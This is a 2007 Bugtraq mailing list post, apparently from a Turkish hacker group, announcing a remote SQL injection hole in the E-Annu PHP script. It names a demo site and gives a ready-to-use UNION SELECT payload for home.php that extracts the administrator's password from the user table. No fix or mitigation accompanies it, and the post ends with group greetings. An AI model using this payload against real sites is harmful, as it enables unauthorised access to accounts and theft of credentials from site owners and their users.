Bugtraq mailing list archives

E-Annu (home.php) Remote SQL Injection Vulnerability


From: ilkerkandemir () mynet com
Date: 30 Apr 2007 18:49:18 -0000

-------------------------------------------------AYYILDIZ.ORG PreSents...


Script: E-Annu

Script D.: http://www.alic.ch/sources/annu.rar
Script Demo: http://www.autocash.ch/annu/



Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>



info:  */ Siz Yokken AYYILDIZ Vardi. */

-------------------------------------------------Exploit:



home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/**/WHERE/**/user_id=1/*



-------------------------------------------------

Reklam yeri: Turkistiklal.com

-------------------------------------------------
Tnx:H0tturk,Dr.Max Virus,Gencnesil,X-Hacker,Ajann
Special Tnx: AYYILDIZ.ORG


Current thread: